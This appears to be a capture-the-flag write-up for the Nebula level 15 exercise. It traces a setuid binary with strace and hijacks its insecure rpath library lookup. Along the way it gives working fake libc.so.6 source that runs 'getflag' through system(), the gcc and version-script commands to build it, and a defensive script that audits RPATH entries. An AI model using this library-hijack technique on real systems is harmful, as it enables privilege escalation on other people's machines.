"Whatever Pages"

Insecure Library Loading

Nebula 15 Agenda: “strace the binary at ‘/home/flag15/flag15’ and see if you spot anything out of the ordinary.”


Starting with a trace:

...
open("/var/tmp/flag15/tls/i686/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/tls/i686/sse2/cmov", 0xbf88db44) = -1 ENOENT (No such file or directory)
...
open("/var/tmp/flag15/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15", {st_mode=S_IFDIR|0775, st_size=3, ...}) = 0
open("/etc/ld.so.cache", O_RDONLY)      = 3
...

What we can see is that the program tries to find and load “libc.so.6” from a predefined set of directories that was bound into the binary through the linker's (ld) rpath option. Only at the end does it succeed via the cache (which in turn contains the proper libc path). Hence, since we already know all the lookup locations, we could try to hijack the library from one of them.
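The condition the trace exposes (an rpath entry under a directory an unprivileged user can write to, plus lookups that silently fall through) is easy to audit. Below is an added example, not part of the original write-up, which parses `readelf -d` output and flags every RPATH/RUNPATH entry that is empty, missing, or world-writable; it assumes GNU or BSD readelf and ls, does not handle paths containing spaces, and checks `$ORIGIN` tokens literally rather than expanding them.

```sh
#!/bin/sh
# Added example, not from the original write-up: audit a binary's
# RPATH/RUNPATH for search directories that an unprivileged user could
# place a fake "libc.so.6" into, which is the condition flag15 exhibits.
# Assumptions: GNU/BSD readelf and ls; paths with spaces are not handled,
# and $ORIGIN tokens are checked literally rather than expanded.

# Pull the search list out of `readelf -d` text supplied on stdin,
# joining an RPATH line and a RUNPATH line with ':' if both are present.
extract_rpath() {
    sed -n -e 's/.*(RPATH).*\[\(.*\)\].*/\1/p' \
           -e 's/.*(RUNPATH).*\[\(.*\)\].*/\1/p' | paste -s -d ':' -
}

# Walk a ':'-separated list and print one verdict per entry:
#   EMPTY    empty element, which ld.so resolves to the current directory
#   MISSING  directory does not exist, so its parent's mode decides who can create it
#   WRITABLE the "other" write bit is set (column 9 of `ls -ld`)
#   ok       nothing obvious
# Returns 1 if any entry was flagged, so the function can gate a CI check.
audit_dirs() {
    if [ -z "$1" ]; then return 0; fi   # no rpath at all: nothing to audit
    _rc=0
    _list="$1:"
    while [ -n "$_list" ]; do
        _d=${_list%%:*}
        _list=${_list#*:}
        if [ -z "$_d" ]; then
            echo "EMPTY    (current directory)"; _rc=1
        elif [ ! -d "$_d" ]; then
            echo "MISSING  $_d"; _rc=1
        else
            case $(ls -ldL "$_d") in        # -L: judge the target of a symlink
                ????????w*) echo "WRITABLE $_d"; _rc=1 ;;
                *)          echo "ok       $_d" ;;
            esac
        fi
    done
    return $_rc
}

# Usage: sh audit_rpath.sh /home/flag15/flag15
if [ $# -gt 0 ]; then
    audit_dirs "$(readelf -d "$1" | extract_rpath)"
fi
```

Run against the level binary, the script reports the rpath directory as WRITABLE, which is the finding the trace above only hints at.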

Starting from a simple source file with a single “__attribute((constructor))” (as a test initialization routine), I ran into a couple of relocation errors:

symbol __libc_start_main, version GLIBC_2.0 not defined in file libc.so.6 with link time reference
...
symbol __cxa_finalize, version GLIBC_2.1.3 not defined in file libc.so.6 with link time reference
...
no version information available (required by /home/flag15/flag15)

which led to the following result:

/* fake_lib.c - stand-in "libc.so.6" placed in the rpath directory */
#include <stdlib.h>
#include <stdio.h>

/* Stub for a symbol the binary references at load time; nothing to finalize. */
void __cxa_finalize(void *d) { return; }

/* The dynamic loader calls this instead of the real libc entry point,
   so the target's own main() never runs. */
int __libc_start_main(int (*main)(int, char **, char **), int argc,
                      char **ubp_av, void (*init)(void), void (*fini)(void),
                      void (*rtld_fini)(void), void *stack_end) {
    printf("----------------------------------------------------------\n");
    system("getflag");
    printf("----------------------------------------------------------\n");
    exit(0);
}

To eliminate the error about absent version information, a version script was used (it allows explicit control over the symbols exported by a library):

echo "GLIBC_2.0 {};" > fakelib.map

Compiled with static “libC” linking:

gcc -shared -static-libgcc -fPIC -Wl,--version-script=fakelib.map,-Bstatic -o libc.so.6 fake_lib.c

and the final cut… drum roll, the climax: boom:

level15@nebula:/var/tmp/flag15$ /home/flag15/flag15
----------------------------------------------------------
You have successfully executed getflag on a target account
----------------------------------------------------------

Resources: